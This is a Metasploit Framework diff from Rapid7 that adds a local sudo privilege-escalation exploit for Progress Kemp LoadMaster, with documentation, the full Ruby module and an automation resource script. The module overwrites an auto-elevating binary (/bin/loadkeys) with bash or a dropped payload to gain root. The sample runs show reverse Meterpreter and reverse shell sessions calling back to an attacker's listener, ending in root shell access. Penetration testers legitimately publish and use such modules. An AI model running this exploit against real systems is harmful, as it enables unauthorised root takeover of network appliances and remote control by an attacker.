rapid7 · smcintyre-r7 · May 10, 2024 · Apr 17, 2024 · Apr 17, 2024 · May 3, 2024
diff --git a/...ation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md b/...ation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md
@@ -0,0 +1,178 @@
+## Vulnerable Application
+Progress Kemp LoadMaster up to at least 7.2.59.2.22338.  The vendor is aware of this "feature," but
+has chosen not to change the behavior.  It was originally paired with CVE-2024-1212, but as this
+privilege escalation was not patched when CVE-2024-1212 was, we split it into its own module.
+This exploit/feature allows the default `bal` user to run several binaries with the `sudo` prefix
+that will elevate without prompting for a password.  As the configuration is based on filename and
+the `bal` user has write permissions to these files, the `bal` user can simply write over the existing
+binary with one of their choosing, then prefix it with `sudo` and launch the binary with `root`
+privileges.
+This module defaults to overwrite `/bin/loadkeys` with `/bin/bash`, though other binaries would work,
+too.
+
+For more details on the vulnerability:  
+https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/
+
+https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
+
+A trial VM which the exploit should work against out of the box can be downloaded from:
+https://sso.kemptechnologies.com/register/kemp/vlm
+
+The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.
+https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw
+
+Because this is an appliance, there are limited commands available for command-based payloads.
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Gain a session on a Progress Kemp Loadmaster target as the `bal` user
+1. Do: `use exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024`
+1. Do: `set SESSION <session>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `root` user.
+
+## Scenarios
+
+### LoadMaster 7.2.59.0.22007
+#### Metasploit Binary Dropper Payload
+```msf
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options
+
+Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   SESSION        1                yes       The session to run this module on
+   TARGET_BINARY  /bin/loadkeys    yes       The path for a binary file that has permission to auto-elevate.
+   WRITABLE_DIR   /tmp             yes       A directory where we can write files
+
+
+Payload options (linux/x64/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 3 indicators this is a KEMP product
+[!] The service is running, but could not be validated.
+[*] Execute dropper
+[*] Moving /bin/loadkeys to /tmp/.xcglzfitgpg
+[*] Moving /tmp/.feooibtpp to /bin/loadkeys
+[*] Running /bin/loadkeys
+[+] Deleted /tmp/.feooibtpp
+[*] Meterpreter session 8 opened (10.5.135.201:4444 -> 10.5.134.141:28858) at 2024-05-03 12:05:12 -0500
+[*] Moving /tmp/.xcglzfitgpg to /bin/loadkeys
+[+] /bin/loadkeys returned to original contents
+
+meterpreter > sysinfo
+Computer     : 10.5.134.141
+OS           : SuSE 7.2 (Linux 4.14.137)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > 
+
+
+```
+
+#### Reverse Bash Command Payload
+```msf
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options
+
+Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   SESSION        1                yes       The session to run this module on
+   TARGET_BINARY  /bin/loadkeys    yes       The path for a binary file that has permission to auto-elevate.
+   WRITABLE_DIR   /tmp             yes       A directory where we can write files
+
+
+Payload options (cmd/unix/reverse_awk):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 3 indicators this is a KEMP product
+[!] The service is running, but could not be validated.
+[*] Execute command
+[*] Moving /bin/loadkeys to /tmp/.twqrvjasafa
+[*] Moving /bin/bash to /bin/loadkeys
+[*] Running payload command
+[*] Command shell session 7 opened (10.5.135.201:4444 -> 10.5.134.141:16589) at 2024-05-03 12:02:00 -0500
+[*] 
+[*] Moving /tmp/.twqrvjasafa to /bin/loadkeys
+[+] /bin/loadkeys returned to original contents
+
+ls
+azurelinuxagent
+bin
+cgroup
+dev
+dmZPnkPUPoV
+etc
+initial_setup.sh
+lib
+lib64
+lost+found
+mnt
+one4net
+openssl
+proc
+root
+sbin
+sks
+sys
+tmp
+user
+usr
+var
+touch tempfile
+ls -l
+total 51
+drwxr-xr-x   5 root root  1024 Mar 22  2023 azurelinuxagent
+.
+.
+.
+-rw-r--r--   1 root root     0 May  3 17:02 tempfile
+.
+.
+drwxr-xr-x  12 root root  1024 Mar 21 17:29 var
+```
diff --git a/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb b/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
@@ -0,0 +1,161 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Kemp LoadMaster Local sudo privilege escalation',
+        'Description' => %q{
+          This module abuses a feature of the sudo command on Progress Kemp
+          LoadMaster.  Certain binary files are allowed to automatically elevate
+          with the sudo command.  This is based off of the file name.  Some files
+          have this permission are not write-protected from the default 'bal' user.
+          As such, if the file is overwritten with an arbitrary file, it will still
+          auto-elevate.  This module overwrites the /bin/loadkeys file with another
+          executable.
+        },
+        'Author' => [
+          'Dave Yesland with Rhino Security Labs',
+          'bwatters-r7' # module,
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],
+          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']
+        ],
+        'DisclosureDate' => '2024-03-19',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Platform' => ['unix', 'linux'],
+        'Targets' => [
+          [
+            'Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Command',
+            {
+              'Arch' => [ARCH_CMD],
+              'Type' => :command,
+              'Payload' =>
+                {
+                  'BadChars' => "\x27",
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd',
+                      'RequiredCmd' => 'generic gawk telnet ssh echo'
+                    }
+                },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse'
+              }
+            }
+          ]
+        ],
+        'Privileged' => true
+      )
+    )
+    register_options([
+      OptString.new('TARGET_BINARY', [true, 'The path for a binary file that has permission to auto-elevate.', '/bin/loadkeys']),
+      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
+  end
+
+  def check
+    score = 0
+    score += 1 if read_file('/usr/wui/index.js').include?('KEMP')
+    score += 1 if read_file('/etc/motd').include?('Kemp LoadMaster')
+    score += 1 if exists?('/usr/wui/eula.kemp.html')
+    vprint_status("Found #{score} indicators this is a KEMP product")
+    return CheckCode::Detected if score > 0
+
+    return CheckCode::Safe
+  end
+
+  def verify_copy(src, dest, elevate)
+    orig_file_hash = file_remote_digestmd5(src)
+    vprint_status("Moving #{src} to #{dest}")
+    if elevate
+      output = cmd_exec("sudo /bin/cp '#{src}' '#{dest}'")
+    else
+      output = cmd_exec("/bin/cp '#{src}' '#{dest}'")
+    end
+    return true if file_remote_digestmd5(dest) == orig_file_hash
+
+    print_bad("Copy failed - #{output}")
+    false
+  end
+
+  def execute_dropper(target_binary, binary_rename, temp_payload_path)
+    vprint_status('Execute dropper')
+    write_file(temp_payload_path, generate_payload_exe)
+    chmod(temp_payload_path)
+    register_file_for_cleanup(temp_payload_path)
+    return unless verify_copy(target_binary, binary_rename, false)
+    return unless verify_copy(temp_payload_path, target_binary, true)
+
+    vprint_status("Running #{target_binary}")
+    cmd_exec("sudo '#{target_binary}'")
+  end
+
+  def execute_command(target_binary, binary_rename, cmd)
+    vprint_status('Execute command')
+    # save copy of target_binary
+    return unless verify_copy(target_binary, binary_rename, false)
+    return unless verify_copy('/bin/bash', target_binary, true)
+
+    vprint_status('Running payload command')
+    vprint_status(cmd_exec("sudo #{target_binary} -c '#{cmd}'"))
+  end
+
+  def exploit
+    writable_dir = datastore['WRITABLE_DIR']
+    if writable_dir.blank? || (writable_dir[-1] != '/')
+      writable_dir += '/'
+    end
+    target_binary = datastore['TARGET_BINARY']
+    binary_rename = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"
+    target_binary_hash = file_remote_digestmd5(target_binary)
+    begin
+      case target['Type']
+      when :dropper
+        temp_payload = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"
+        execute_dropper(target_binary, binary_rename, temp_payload)
+      when :command
+        execute_command(target_binary, binary_rename, payload.encoded)
+      end
+    ensure
+      unless target_binary_hash == file_remote_digestmd5(target_binary)
+        cmd_exec("sudo rm '#{target_binary}'")
+        verify_copy(binary_rename, target_binary, true)
+        cmd_exec("sudo rm '#{binary_rename}'")
+      end
+    end
+    if target_binary_hash == file_remote_digestmd5(target_binary)
+      print_good("#{target_binary} returned to original contents")
+    else
+      print_bad("#{target_binary} was not returned to original contents")
+    end
+  end
+end
diff --git a/scripts/resource/run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc b/scripts/resource/run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc
@@ -0,0 +1,8 @@
+<ruby>
+print_status("Running Progress Kemp Loadmaster sudo Privilege Escalation")
+run_single("use modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024")
+run_single("set session -1")
+session_lhost = framework.sessions[framework.sessions.keys.last].tunnel_local.split(':')[0..-2].join(':')
+run_single("set lhost #{session_lhost}")
+run_single("run")
+</ruby>